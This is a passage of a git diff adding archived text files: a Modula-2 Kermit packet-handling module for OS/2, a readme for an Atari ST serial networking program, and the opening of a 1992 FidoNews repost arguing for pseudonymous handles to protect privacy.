+COMMPORT.OBJ+ +FILES.OBJ+ +SHELL.OBJ+ +TERM.OBJ+ +PAD.OBJ+ +DATALINK.OBJ +pckermit +pckermit +PM+ +OS2+ +M2LIB+ +DOSCALLS +pckermit.edf + +[FILE PAD.MOD] + +IMPLEMENTATION MODULE PAD; (* Packet Assembler/Disassembler for Kermit *) + + FROM SYSTEM IMPORT + ADR; + + FROM Storage IMPORT + ALLOCATE, DEALLOCATE; + + FROM Screen IMPORT + ClrScr, WriteString, WriteInt, WriteHex, WriteLn; + + FROM DosCalls IMPORT + ExitType, DosExit; + + FROM Strings IMPORT + Length, Assign; + + FROM FileSystem IMPORT + File; + + FROM Directories IMPORT + FileAttributes, AttributeSet, DirectoryEntry, FindFirst, FindNext; + + FROM Files IMPORT + Status, FileType, Open, Create, CloseFile, Get, Put, DoWrite; + + FROM PMWIN IMPORT + MPARAM, WinPostMsg; + + FROM Shell IMPORT + ChildFrameWindow, comport; + + FROM KH IMPORT + COM_OFF; + + FROM DataLink IMPORT + FlushUART, SendPacket, ReceivePacket; + + FROM SYSTEM IMPORT + BYTE; + + IMPORT ASCII; + + + CONST + myMAXL = 94; + myTIME = 10; + myNPAD = 0; + myPADC = 0C; + myEOL = 0C; + myQCTL = '#'; + myQBIN = '&'; + myCHKT = '1'; (* one character checksum *) + MAXtrys = 5; + (* From DEFINITION MODULE: + PAD_Quit = 0; *) + PAD_SendPacket = 1; + PAD_ResendPacket = 2; + PAD_NoSuchFile = 3; + PAD_ExcessiveErrors = 4; + PAD_ProbClSrcFile = 5; + PAD_ReceivedPacket = 6; + PAD_Filename = 7; + PAD_RequestRepeat = 8; + PAD_DuplicatePacket = 9; + PAD_UnableToOpen = 10; + PAD_ProbClDestFile = 11; + PAD_ErrWrtFile = 12; + PAD_Msg = 13; + + + TYPE + (* From Definition Module: + PacketType = ARRAY [1..100] OF CHAR; + *) + SMALLSET = SET OF [0..7]; (* a byte *) + + + VAR + yourMAXL : INTEGER; (* maximum packet length -- up to 94 *) + yourTIME : INTEGER; (* time out -- seconds *) + (* From Definition Module + yourNPAD : INTEGER; (* number of padding characters *) + yourPADC : CHAR; (* padding characters *) + yourEOL : CHAR; (* End Of Line -- terminator *) + *) + yourQCTL : CHAR; (* character for quoting controls '#' *) + yourQBIN : CHAR; (* character for quoting binary '&' *) + yourCHKT : CHAR; (* check type -- 1 = checksum, etc. *) + sF, rF : File; (* files being sent/received *) + InputFileOpen : BOOLEAN; + rFname : ARRAY [0..20] OF CHAR; + sP, rP : PacketType; (* packets sent/received *) + sSeq, rSeq : INTEGER; (* sequence numbers *) + PktNbr : INTEGER; (* actual packet number -- no repeats up to 32,000 *) + ErrorMsg : ARRAY [0..40] OF CHAR; + MP1, MP2 : MPARAM; + + + PROCEDURE PtrToStr (mp [VALUE] : MPARAM; VAR s : ARRAY OF CHAR); + (* Convert a pointer to a string into a string *) + + TYPE + PC = POINTER TO CHAR; + + VAR + p : PC; + i : CARDINAL; + c : CHAR; + + BEGIN + i := 0; + REPEAT + p := PC (mp); + c := p^; + s[i] := c; + INC (i); + INC (mp.L); + UNTIL c = 0C; + END PtrToStr; + + + PROCEDURE DoPADMsg (mp1, mp2 [VALUE] : MPARAM); + (* Output messages for Packet Assembler/Disassembler *) + + VAR + Message : ARRAY [0..40] OF CHAR; + + BEGIN + CASE CARDINAL (mp1.W1) OF + PAD_SendPacket: + WriteString ("Sent Packet #"); + WriteInt (mp2.W1, 5); + WriteString (" (ID: "); WriteHex (mp2.W2, 2); + WriteString ("h)"); + | PAD_ResendPacket: + WriteString ("ERROR -- Resending:"); WriteLn; + WriteString (" Packet #"); + WriteInt (mp2.W1, 5); + WriteString (" (ID: "); WriteHex (mp2.W2, 2); + WriteString ("h)"); + | PAD_NoSuchFile: + WriteString ("No such file: "); + PtrToStr (mp2, Message); WriteString (Message); + | PAD_ExcessiveErrors: + WriteString ("Excessive errors ..."); + | PAD_ProbClSrcFile: + WriteString ("Problem closing source file..."); + | PAD_ReceivedPacket: + WriteString ("Received Packet #"); + WriteInt (mp2.W1, 5); + WriteString (" (ID: "); WriteHex (mp2.W2, 2); + WriteString ("h)"); + | PAD_Filename: + WriteString ("Filename = "); + PtrToStr (mp2, Message); WriteString (Message); + | PAD_RequestRepeat: + WriteString ("ERROR -- Requesting Repeat:"); WriteLn; + WriteString (" Packet #"); + WriteInt (mp2.W1, 5); + WriteString (" (ID: "); WriteHex (mp2.W2, 2); + WriteString ("h)"); + | PAD_DuplicatePacket: + WriteString ("Discarding Duplicate:"); WriteLn; + WriteString (" Packet #"); + WriteString (" (ID: "); WriteHex (mp2.W2, 2); + WriteString ("h)"); + | PAD_UnableToOpen: + WriteString ("Unable to open file: "); + PtrToStr (mp2, Message); WriteString (Message); + | PAD_ProbClDestFile: + WriteString ("Error closing file: "); + PtrToStr (mp2, Message); WriteString (Message); + | PAD_ErrWrtFile: + WriteString ("Error writing to file: "); + PtrToStr (mp2, Message); WriteString (Message); + | PAD_Msg: + PtrToStr (mp2, Message); WriteString (Message); + ELSE + (* Do Nothing *) + END; + WriteLn; + END DoPADMsg; + + + PROCEDURE CloseInput; + (* Close the input file, if it exists. Reset Input File Open flag *) + BEGIN + IF InputFileOpen THEN + IF CloseFile (sF, Input) = Done THEN + InputFileOpen := FALSE; + ELSE + MP1.W1 := PAD_ProbClSrcFile; MP1.W2 := 0; + MP2.L := LONGINT (ADR (sFname)); + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + END; + END; + END CloseInput; + + + PROCEDURE NormalQuit; + (* Exit from Thread, Post message to Window *) + BEGIN + MP1.W1 := PAD_Quit; MP1.W2 := 0; + MP1.L := 0; + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + DosExit (EXIT_THREAD, 0); + END NormalQuit; + + + PROCEDURE ErrorQuit; + (* Exit from Thread, Post message to Window *) + BEGIN + MP1.W1 := PAD_Error; MP1.W2 := 0; + MP2.L := 0; + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + DosExit (EXIT_THREAD, 0); + END ErrorQuit; + + + PROCEDURE ByteXor (a, b : BYTE) : BYTE; + BEGIN + RETURN BYTE (SMALLSET (a) / SMALLSET (b)); + END ByteXor; + + + PROCEDURE Char (c : INTEGER) : CHAR; + (* converts a number 0-94 into a printable character *) + BEGIN + RETURN (CHR (CARDINAL (ABS (c) + 32))); + END Char; + + + PROCEDURE UnChar (c : CHAR) : INTEGER; + (* converts a character into its corresponding number *) + BEGIN + RETURN (ABS (INTEGER (ORD (c)) - 32)); + END UnChar; + + + PROCEDURE TellError (Seq : INTEGER); + (* Send error packet *) + BEGIN + sP[1] := Char (15); + sP[2] := Char (Seq); + sP[3] := 'E'; (* E-type packet *) + sP[4] := 'R'; (* error message starts *) + sP[5] := 'e'; + sP[6] := 'm'; + sP[7] := 'o'; + sP[8] := 't'; + sP[9] := 'e'; + sP[10] := ' '; + sP[11] := 'A'; + sP[12] := 'b'; + sP[13] := 'o'; + sP[14] := 'r'; + sP[15] := 't'; + sP[16] := 0C; + SendPacket (sP); + END TellError; + + + PROCEDURE ShowError (p : PacketType); + (* Output contents of error packet to the screen *) + + VAR + i : INTEGER; + + BEGIN + FOR i := 4 TO UnChar (p[1]) DO + ErrorMsg[i - 4] := p[i]; + END; + ErrorMsg[i - 4] := 0C; + MP1.W1 := PAD_Msg; MP1.W2 := 0; + MP2.L := LONGINT (ADR (ErrorMsg)); + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + END ShowError; + + + PROCEDURE youInit (type : CHAR); + (* I initialization YOU for Send and Receive *) + BEGIN + sP[1] := Char (11); (* Length *) + sP[2] := Char (0); (* Sequence *) + sP[3] := type; + sP[4] := Char (myMAXL); + sP[5] := Char (myTIME); + sP[6] := Char (myNPAD); + sP[7] := CHAR (ByteXor (myPADC, 100C)); + sP[8] := Char (ORD (myEOL)); + sP[9] := myQCTL; + sP[10] := myQBIN; + sP[11] := myCHKT; + sP[12] := 0C; (* terminator *) + SendPacket (sP); + END youInit; + + + PROCEDURE myInit; + (* YOU initialize ME for Send and Receive *) + + VAR + len : INTEGER; + + BEGIN + len := UnChar (rP[1]); + IF len >= 4 THEN + yourMAXL := UnChar (rP[4]); + ELSE + yourMAXL := 94; + END; + IF len >= 5 THEN + yourTIME := UnChar (rP[5]); + ELSE + yourTIME := 10; + END; + IF len >= 6 THEN + yourNPAD := UnChar (rP[6]); + ELSE + yourNPAD := 0; + END; + IF len >= 7 THEN + yourPADC := CHAR (ByteXor (rP[7], 100C)); + ELSE + yourPADC := 0C; + END; + IF len >= 8 THEN + yourEOL := CHR (UnChar (rP[8])); + ELSE + yourEOL := 0C; + END; + IF len >= 9 THEN + yourQCTL := rP[9]; + ELSE + yourQCTL := 0C; + END; + IF len >= 10 THEN + yourQBIN := rP[10]; + ELSE + yourQBIN := 0C; + END; + IF len >= 11 THEN + yourCHKT := rP[11]; + IF yourCHKT # myCHKT THEN + yourCHKT := '1'; + END; + ELSE + yourCHKT := '1'; + END; + END myInit; + + + PROCEDURE SendInit; + BEGIN + youInit ('S'); + END SendInit; + + + PROCEDURE SendFileName; + + VAR + i, j : INTEGER; + + BEGIN + (* send file name *) + i := 4; j := 0; + WHILE sFname[j] # 0C DO + sP[i] := sFname[j]; + INC (i); INC (j); + END; + sP[1] := Char (j + 3); + sP[2] := Char (sSeq); + sP[3] := 'F'; (* filename packet *) + sP[i] := 0C; + SendPacket (sP); + END SendFileName; + + + PROCEDURE SendEOF; + BEGIN + sP[1] := Char (3); + sP[2] := Char (sSeq); + sP[3] := 'Z'; (* end of file *) + sP[4] := 0C; + SendPacket (sP); + END SendEOF; + + + PROCEDURE SendEOT; + BEGIN + sP[1] := Char (3); + sP[2] := Char (sSeq); + sP[3] := 'B'; (* break -- end of transmit *) + sP[4] := 0C; + SendPacket (sP); + END SendEOT; + + + PROCEDURE GetAck() : BOOLEAN; + (* Look for acknowledgement -- retry on timeouts or NAKs *) + + VAR + Type : CHAR; + Seq : INTEGER; + retrys : INTEGER; + AckOK : BOOLEAN; + + BEGIN + MP1.W1 := PAD_SendPacket; MP1.W2 := 0; + MP2.W1 := PktNbr; MP2.W2 := sSeq; + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + + retrys := MAXtrys; + LOOP + IF Aborted THEN + TellError (sSeq); + CloseInput; + ErrorQuit; + END; + IF ReceivePacket (rP) THEN + Seq := UnChar (rP[2]); + Type := rP[3]; + IF (Seq = sSeq) AND (Type = 'Y') THEN + AckOK := TRUE; + ELSIF (Seq = (sSeq + 1) MOD 64) AND (Type = 'N') THEN + AckOK := TRUE; (* NAK for (n + 1) taken as ACK for n *) + ELSIF Type = 'E' THEN + ShowError (rP); + AckOK := FALSE; + retrys := 0; + ELSE + AckOK := FALSE; + END; + ELSE + AckOK := FALSE; + END; + IF AckOK OR (retrys = 0) THEN + EXIT; + ELSE + MP1.W1 := PAD_ResendPacket; MP1.W2 := 0; + MP2.W1 := PktNbr; MP2.W2 := sSeq; + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + + DEC (retrys); + FlushUART; + SendPacket (sP); + END; + END; + + IF AckOK THEN + INC (PktNbr); + sSeq := (sSeq + 1) MOD 64; + RETURN TRUE; + ELSE + RETURN FALSE; + END; + END GetAck; + + + PROCEDURE GetInitAck() : BOOLEAN; + (* configuration for remote station *) + BEGIN + IF GetAck() THEN + myInit; + RETURN TRUE; + ELSE + RETURN FALSE; + END; + END GetInitAck; + + + PROCEDURE Send; + (* Send one or more files: sFname may be ambiguous *) + + TYPE + LP = POINTER TO LIST; (* list of filenames *) + LIST = RECORD + fn : ARRAY [0..20] OF CHAR; + next : LP; + END; + + VAR + gotFN : BOOLEAN; + attr : AttributeSet; + ent : DirectoryEntry; + front, back, t : LP; (* add at back of queue, remove from front *) + + BEGIN + Aborted := FALSE; + InputFileOpen := FALSE; + + front := NIL; back := NIL; + attr := AttributeSet {}; (* normal files only *) + IF Length (sFname) = 0 THEN + MP1.W1 := PAD_Msg; MP1.W2 := 0; + MP2.L := LONGINT (ADR ("No file specified...")); + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + ErrorQuit; + ELSE + gotFN := FindFirst (sFname, attr, ent); + WHILE gotFN DO (* build up a list of file names *) + ALLOCATE (t, SIZE (LIST)); + Assign (ent.name, t^.fn); + t^.next := NIL; + IF front = NIL THEN + front := t; (* start from empty queue *) + ELSE + back^.next := t; (* and to back of queue *) + END; + back := t; + gotFN := FindNext (ent); + END; + END; + + IF front = NIL THEN + MP1.W1 := PAD_NoSuchFile; MP1.W2 := 0; + MP2.L := LONGINT (ADR (sFname)); + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + ErrorQuit; + ELSE + sSeq := 0; PktNbr := 0; + FlushUART; + SendInit; (* my configuration information *) + IF NOT GetInitAck() THEN (* get your configuration information *) + MP1.W1 := PAD_ExcessiveErrors; MP1.W2 := 0; + MP2.L := 0; + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + ErrorQuit; + END; + + WHILE front # NIL DO (* send the files *) + Assign (front^.fn, sFname); + PktNbr := 1; + Send1; + t := front; + front := front^.next; + DEALLOCATE (t, SIZE (LIST)); + END; + END; + + SendEOT; + IF NOT GetAck() THEN + MP1.W1 := PAD_ExcessiveErrors; MP1.W2 := 0; + MP2.L := 0; + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + CloseInput; + ErrorQuit; + END; + NormalQuit; + END Send; + + + PROCEDURE Send1; + (* Send one file: sFname *) + + VAR + ch : CHAR; + i : INTEGER; + + BEGIN + IF Open (sF, sFname) = Done THEN + InputFileOpen := TRUE; + ELSE; + MP1.W1 := PAD_NoSuchFile; MP1.W2 := 0; + MP2.L := LONGINT (ADR (sFname)); + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + ErrorQuit; + END; + + MP1.W1 := PAD_Filename; MP1.W2 := 0; + MP2.L := LONGINT (ADR (sFname)); + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + MP1.W1 := PAD_Msg; MP1.W2 := 0; + MP2.L := LONGINT (ADR ("( to abort file transfer.)")); + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + + SendFileName; + IF NOT GetAck() THEN + MP1.W1 := PAD_ExcessiveErrors; MP1.W2 := 0; + MP2.L := 0; + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + CloseInput; + ErrorQuit; + END; + + (* send file *) + i := 4; + LOOP + IF Get (sF, ch) = EOF THEN (* send current packet & terminate *) + sP[1] := Char (i - 1); + sP[2] := Char (sSeq); + sP[3] := 'D'; (* data packet *) + sP[i] := 0C; (* indicate end of packet *) + SendPacket (sP); + IF NOT GetAck() THEN + MP1.W1 := PAD_ExcessiveErrors; MP1.W2 := 0; + MP2.L := 0; + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + CloseInput; + ErrorQuit; + END; + SendEOF; + IF NOT GetAck() THEN + MP1.W1 := PAD_ExcessiveErrors; MP1.W2 := 0; + MP2.L := 0; + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + CloseInput; + ErrorQuit; + END; + EXIT; + END; + + IF i >= (yourMAXL - 4) THEN (* send current packet *) + sP[1] := Char (i - 1); + sP[2] := Char (sSeq); + sP[3] := 'D'; + sP[i] := 0C; + SendPacket (sP); + IF NOT GetAck() THEN + MP1.W1 := PAD_ExcessiveErrors; MP1.W2 := 0; + MP2.L := 0; + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + CloseInput; + ErrorQuit; + END; + i := 4; + END; + + (* add character to current packet -- update count *) + IF ch > 177C THEN (* must be quoted (QBIN) and altered *) + (* toggle bit 7 to turn it off *) + ch := CHAR (ByteXor (ch, 200C)); + sP[i] := myQBIN; INC (i); + END; + IF (ch < 40C) OR (ch = 177C) THEN (* quote (QCTL) and alter *) + (* toggle bit 6 to turn it on *) + ch := CHAR (ByteXor (ch, 100C)); + sP[i] := myQCTL; INC (i); + END; + IF (ch = myQCTL) OR (ch = myQBIN) THEN (* must send it quoted *) + sP[i] := myQCTL; INC (i); + END; + sP[i] := ch; INC (i); + END; (* loop *) + + CloseInput; + END Send1; + + + PROCEDURE ReceiveInit() : BOOLEAN; + (* receive my initialization information from you *) + + VAR + RecOK : BOOLEAN; + trys : INTEGER; + + BEGIN + trys := 1; + LOOP + IF Aborted THEN + TellError (rSeq); + ErrorQuit; + END; + RecOK := ReceivePacket (rP) AND (rP[3] = 'S'); + IF RecOK OR (trys = MAXtrys) THEN + EXIT; + ELSE + INC (trys); + SendNak; + END; + END; + + IF RecOK THEN + myInit; + RETURN TRUE; + ELSE + RETURN FALSE; + END; + END ReceiveInit; + + + PROCEDURE SendInitAck; + (* acknowledge your initialization of ME and send mine for YOU *) + BEGIN + MP1.W1 := PAD_ReceivedPacket; MP1.W2 := 0; + MP2.W1 := PktNbr; MP2.W2 := rSeq; + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + INC (PktNbr); + rSeq := (rSeq + 1) MOD 64; + youInit ('Y'); + END SendInitAck; + + + PROCEDURE ValidFileChar (VAR ch : CHAR) : BOOLEAN; + (* checks if character is one of 'A'..'Z', '0'..'9', makes upper case *) + BEGIN + ch := CAP (ch); + RETURN ((ch >= 'A') AND (ch <= 'Z')) OR ((ch >= '0') AND (ch <= '9')); + END ValidFileChar; + + + TYPE + HeaderType = (name, eot, fail); + + PROCEDURE ReceiveHeader() : HeaderType; + (* receive the filename -- alter for local conditions, if necessary *) + + VAR + i, j, k : INTEGER; + RecOK : BOOLEAN; + trys : INTEGER; + + BEGIN + trys := 1; + LOOP + IF Aborted THEN + TellError (rSeq); + ErrorQuit; + END; + RecOK := ReceivePacket (rP) AND ((rP[3] = 'F') OR (rP[3] = 'B')); + IF trys = MAXtrys THEN + RETURN fail; + ELSIF RecOK AND (rP[3] = 'F') THEN + i := 4; (* data starts here *) + j := 0; (* beginning of filename string *) + WHILE (ValidFileChar (rP[i])) AND (j < 8) DO + rFname[j] := rP[i]; + INC (i); INC (j); + END; + REPEAT + INC (i); + UNTIL (ValidFileChar (rP[i])) OR (rP[i] = 0C); + rFname[j] := '.'; INC (j); + k := 0; + WHILE (ValidFileChar (rP[i])) AND (k < 3) DO + rFname[j + k] := rP[i]; + INC (i); INC (k); + END; + rFname[j + k] := 0C; + MP1.W1 := PAD_Filename; MP1.W2 := 0; + MP2.L := LONGINT (ADR (rFname)); + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + RETURN name; + ELSIF RecOK AND (rP[3] = 'B') THEN + RETURN eot; + ELSE + INC (trys); + SendNak; + END; + END; + END ReceiveHeader; + + + PROCEDURE SendNak; + BEGIN + MP1.W1 := PAD_RequestRepeat; MP1.W2 := 0; + MP2.W1 := PktNbr; MP2.W2 := rSeq; + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + FlushUART; + sP[1] := Char (3); (* LEN *) + sP[2] := Char (rSeq); + sP[3] := 'N'; (* negative acknowledgement *) + sP[4] := 0C; + SendPacket (sP); + END SendNak; + + + PROCEDURE SendAck (Seq : INTEGER); + BEGIN + IF Seq # rSeq THEN + MP1.W1 := PAD_DuplicatePacket; MP1.W2 := 0; + MP2.W1 := 0; MP2.W2 := rSeq; + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + ELSE + MP1.W1 := PAD_ReceivedPacket; MP1.W2 := 0; + MP2.W1 := PktNbr; MP2.W2 := rSeq; + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + rSeq := (rSeq + 1) MOD 64; + INC (PktNbr); + END; + + sP[1] := Char (3); + sP[2] := Char (Seq); + sP[3] := 'Y'; (* acknowledgement *) + sP[4] := 0C; + SendPacket (sP); + END SendAck; + + + PROCEDURE Receive; + (* Receives a file (or files) *) + + VAR + ch, Type : CHAR; + Seq : INTEGER; + i : INTEGER; + EOF, EOT, QBIN : BOOLEAN; + trys : INTEGER; + + BEGIN + Aborted := FALSE; + + MP1.W1 := PAD_Msg; MP1.W2 := 0; + MP2.L := LONGINT (ADR ("Ready to receive file(s)...")); + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + MP1.W1 := PAD_Msg; MP1.W2 := 0; + MP2.L := LONGINT (ADR ("( to abort file transfer.)")); + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + + FlushUART; + rSeq := 0; PktNbr := 0; + IF NOT ReceiveInit() THEN (* your configuration information *) + MP1.W1 := PAD_ExcessiveErrors; MP1.W2 := 0; + MP2.L := 0; + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + ErrorQuit; + END; + SendInitAck; (* send my configuration information *) + EOT := FALSE; + WHILE NOT EOT DO + CASE ReceiveHeader() OF + eot : EOT := TRUE; EOF := TRUE; + | name : IF Create (rF, rFname) # Done THEN + MP1.W1 := PAD_UnableToOpen; MP1.W2 := 0; + MP2.L := LONGINT (ADR (rFname)); + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + ErrorQuit; + ELSE + PktNbr := 1; + EOF := FALSE; + END; + | fail : MP1.W1 := PAD_ExcessiveErrors; MP1.W2 := 0; + MP2.L := 0; + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + ErrorQuit; + END; + SendAck (rSeq); (* acknowledge for name or eot *) + trys := 1; (* initialize *) + WHILE NOT EOF DO + IF Aborted THEN + TellError (rSeq); + ErrorQuit; + END; + IF ReceivePacket (rP) THEN + Seq := UnChar (rP[2]); + Type := rP[3]; + IF Type = 'Z' THEN + EOF := TRUE; + IF CloseFile (rF, Output) = Done THEN + (* normal file termination *) + ELSE + MP1.W1 := PAD_ProbClDestFile; MP1.W2 := 0; + MP2.L := LONGINT (ADR (rFname)); + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + ErrorQuit; + END; + trys := 1; (* good packet -- reset *) + SendAck (rSeq); + ELSIF Type = 'E' THEN + ShowError (rP); + ErrorQuit; + ELSIF (Type = 'D') AND ((Seq + 1) MOD 64 = rSeq) THEN + (* discard duplicate packet, and Ack anyway *) + trys := 1; + SendAck (Seq); + ELSIF (Type = 'D') AND (Seq = rSeq) THEN + (* put packet into file buffer *) + i := 4; (* first data in packet *) + WHILE rP[i] # 0C DO + ch := rP[i]; INC (i); + IF ch = yourQBIN THEN + ch := rP[i]; INC (i); + QBIN := TRUE; + ELSE + QBIN := FALSE; + END; + IF ch = yourQCTL THEN + ch := rP[i]; INC (i); + IF (ch # yourQCTL) AND (ch # yourQBIN) THEN + ch := CHAR (ByteXor (ch, 100C)); + END; + END; + IF QBIN THEN + ch := CHAR (ByteXor (ch, 200C)); + END; + Put (ch); + END; + + (* write file buffer to disk *) + IF DoWrite (rF) # Done THEN + MP1.W1 := PAD_ErrWrtFile; MP1.W2 := 0; + MP2.L := LONGINT (ADR (rFname)); + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + ErrorQuit; + END; + trys := 1; + SendAck (rSeq); + ELSE + INC (trys); + IF trys = MAXtrys THEN + MP1.W1 := PAD_ExcessiveErrors; MP1.W2 := 0; + MP2.L := 0; + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + ErrorQuit; + ELSE + SendNak; + END; + END; + ELSE + INC (trys); + IF trys = MAXtrys THEN + MP1.W1 := PAD_ExcessiveErrors; MP1.W2 := 0; + MP2.L := 0; + WinPostMsg (ChildFrameWindow, WM_PAD, MP1, MP2); + ErrorQuit; + ELSE + SendNak; + END; + END; + END; + END; + NormalQuit; + END Receive; + + +BEGIN (* module initialization *) + yourEOL := ASCII.cr; + yourNPAD := 0; + yourPADC := 0C; +END PAD. + \ No newline at end of file diff --git a/textfiles.com/computers/anetwork.txt b/textfiles.com/computers/anetwork.txt new file mode 100644 index 00000000..877ab57c --- /dev/null +++ b/textfiles.com/computers/anetwork.txt @@ -0,0 +1,77 @@ + + This program is an attempt to try to make a very simple +ST to ST link. The main objective was to make it as transparent as +possible to the user and to other programs. + + + LOADING AND SETUP + + ANET uses three user vectors starting at $200 and the drivemap +located at $4C2. A reset using the reset buttom sometimes does not +clear the lower system memory so if this program is resident you must +use a cold start "power off and power on" or a reboot program for it to +be reloaded correctly when you run the ANETWORK.PRG or ANETCTRL.PRG after +the reboot. The ANETCTRL.PRG has a reboot selection on the MENU. + + Double-click on the ANETWORK.PRG to load the resident program then +double-click on the ANETCTRL.PRG to load the control program. After the +first load you can usually load both the resident and control programs by +running ANETCTRL.PRG after a reboot. + + ONLY LOAD THE ANETWORK.PRG IF YOU GET A MODULA-2 ERROR +TRYING TO RUN ANETCTRL.PRG FIRST. AS IT WILL LOAD THE ANETWORK.PRG FOR YOU. + + The control program lets you set the baud rate, reboot the ST, +reset the network message sequence count, turn the network on and off, +see which ICONS to install to use the remote disks and of course to quit +the control program. The NEW command on the sequence MENU is to resync +the remote program if it gets out of sync due to a reboot, hang or and +error condition. Click the mouse on NEW to send a resync command to the +remote and try to access the ICON again. + MAKE INT on the mode MENU will make a network setup file called +ANETWORK.INT that ANETWORK.PRG reads to set the baud rate and to turn +the netork on or off. ANETCTRL.PRG also reads the INT file when it is +loaded and uses the parameters to set up the menu values. Clicking the +pointer on MAKE INT will save the current menu values on the ANETCTRL.PRG +menu to a new ANETWORK.INT file. + + To load the dial menu make a file called ANETWORK.DIL. It can +have up to 16 entrys for phone numbers. Each entry must be terminated with +a RETURN. If you have a HAYES modem enter the dial code, the number, a +space, then the name of the service or person. + +Example: +ATDT696-0060 genie +ATDT691-7862 CIS + + + + USE + + Install the ICONS on the GEM DESKTOP for the remote system drive(s) +you wish to access, then just use them just like any other disk drive. Due +to the slower serial access it is usally better to copy the file a local +disk if you wish to edit or run the file. Every effort has been made to +make sure it is error free but I would only use it to read from the remote +rather that sending files due to a crash may cause disk file links to be +lost while creating new files on the remote system. + + + You need a crossover cable for the ST to ST connection. + like this. +local remote + 2------------\ /-------------3 + \/ + /\ + 3------------/ \-------------2 + + 7-----------------------------7 + + + + <-------- any length ---------> + +It is possible to use a modem using a std cable from the ST to modem. + + FRED BROOKS +PS Please let me know of any bugs ASAP. diff --git a/textfiles.com/computers/anonymit b/textfiles.com/computers/anonymit new file mode 100644 index 00000000..cbe180a4 --- /dev/null +++ b/textfiles.com/computers/anonymit @@ -0,0 +1,778 @@ +From caf-talk Caf Jun 8 19:52:43 1992 +Newsgroups: comp.society +Subject: Anonymity and privacy on the network +Message-ID: <92083.072152SOCICOM@auvm.american.edu> +Date: 23 Mar 92 12:21:52 GMT +Organization: The American University - University Computing Center +Lines: 759 +Approved: SOCICOM@AUVM + + +Moderator's note: The following article is a lengthy excerpt from a +recent issue of FIDONEWS concerning individual privacy and the use of +aliases or handles in computer-based communications. It was submitted by +a comp.society reader who used a handle; because the excerpt is a cross- +post from another electronic publication, I have taken the liberty of +viewing the use of a handle by sender as a request for privacy and +anonymity similar to the request a newspaper editor might receive in a +letter to the editor. Thus, while reprinting the submission, the name +and address of the sender are "withheld upon request." The article +raises a number of good points; the submission by a reader using a handle +to preserve anonymity makes a point; and the editorial action of +submitting the reader's posting anonymously makes the question current. +What are the implications of using aliases on the net? + +Greg Welsh, moderator, comp.society +Internet: Socicom@american.edu +Bitnet: Socicom@auvm.bitnet + +[begin excerpt] +F I D O N E W S -- | Vol. 9 No. 9 (2 March 1992) + The newsletter of the | + FidoNet BBS community | Published by: + _ | + / \ | "FidoNews" BBS + /|oo \ | (415)-863-2739 + (_| /_) | FidoNet 1:1/1 + _`@/_ \ _ | Internet: + | | \ \\ | fidonews@fidonews.fidonet.org + | (*) | \ )) | + |__U__| / \// | Editors: + _//|| _\ / | Tom Jennings + (_/(_|(____/ | Tim Pozar + (jm) | +----------------------------+--------------------------------------- +Published weekly by and for the Members of the FidoNet international +amateur network. Copyright 1992, Fido Software. All rights reserved. +Duplication and/or distribution permitted for noncommercial purposes +only. For use in other circumstances, please contact FidoNews. + +Paper price: . . . . . . . . . . . . . . . . . . . . . . . $5.00US +Electronic Price: . . . . . . . . . . . . . . . . . . . . . free! + +For more information about FidoNews refer to the end of this file. +-------------------------------------------------------------------- + + +[...some editing...] +====================================================================== + ARTICLES +====================================================================== + + +The Joy of Handles +Mahatma Kane Jeeves +101/138.8 +David Lescohier +101/138.0 + + + + + THE JOY OF HANDLES + ------------------ + or: + EVERYTHING YOU ALWAYS WANTED TO KNOW ABOUT ME + (but have no right to ask) + -------------------------- + + + * * * * * + + +We should never so entirely avoid danger as to appear +irresolute and cowardly. But, at the same time, we should +avoid unnecessarily exposing ourselves to danger, than +which nothing can be more foolish. [Cicero] + + + * * * * * + + + +Do you trust me? + +If you participate in computer conferencing, and you use +your real name, then you'd better. + +"Why?", you ask. "What can you do with my name?" To start +with, given that and your origin line, I can probably look +you up in your local phone book, and find out where you +live. Even if you are unlisted, there are ways to locate +you based on your name. If you own any property, or pay any +utility bills, your address is a matter of public record. +Do you have children in the public schools? It would be +easy to find out. But that's just the beginning. + +Former Chairman of the U.S. Privacy Protection Commission +David F. Linowes, in his book "Privacy in America" (1989), +writes of New York private investigator Irwin Blye: + + "Challenged to prove his contention that, given a little + time and his usual fee, he could learn all about an + individual without even speaking with him, Blye was + presented with a subject -- a New Jersey + newspaperman.... The result was a five-page, single- + spaced, typed report which documented, though not always + accurately, a wide sweep of the journalist's past, and + was detailed to the point of disclosing his father's + income before his retirement." + +Who am I? If I don't post, you might not even know I exist. +I could be on your local Police Department, or an agent +working with the IRS, or some federal law-enforcement +agency. I could be a member of some fanatical hate group, +or criminal organization. I might even be a former Nixon +White-House staffer! + +I could be that pyromaniacal teenager you flamed last +weekend, for posting a step-by-step description of how he +made 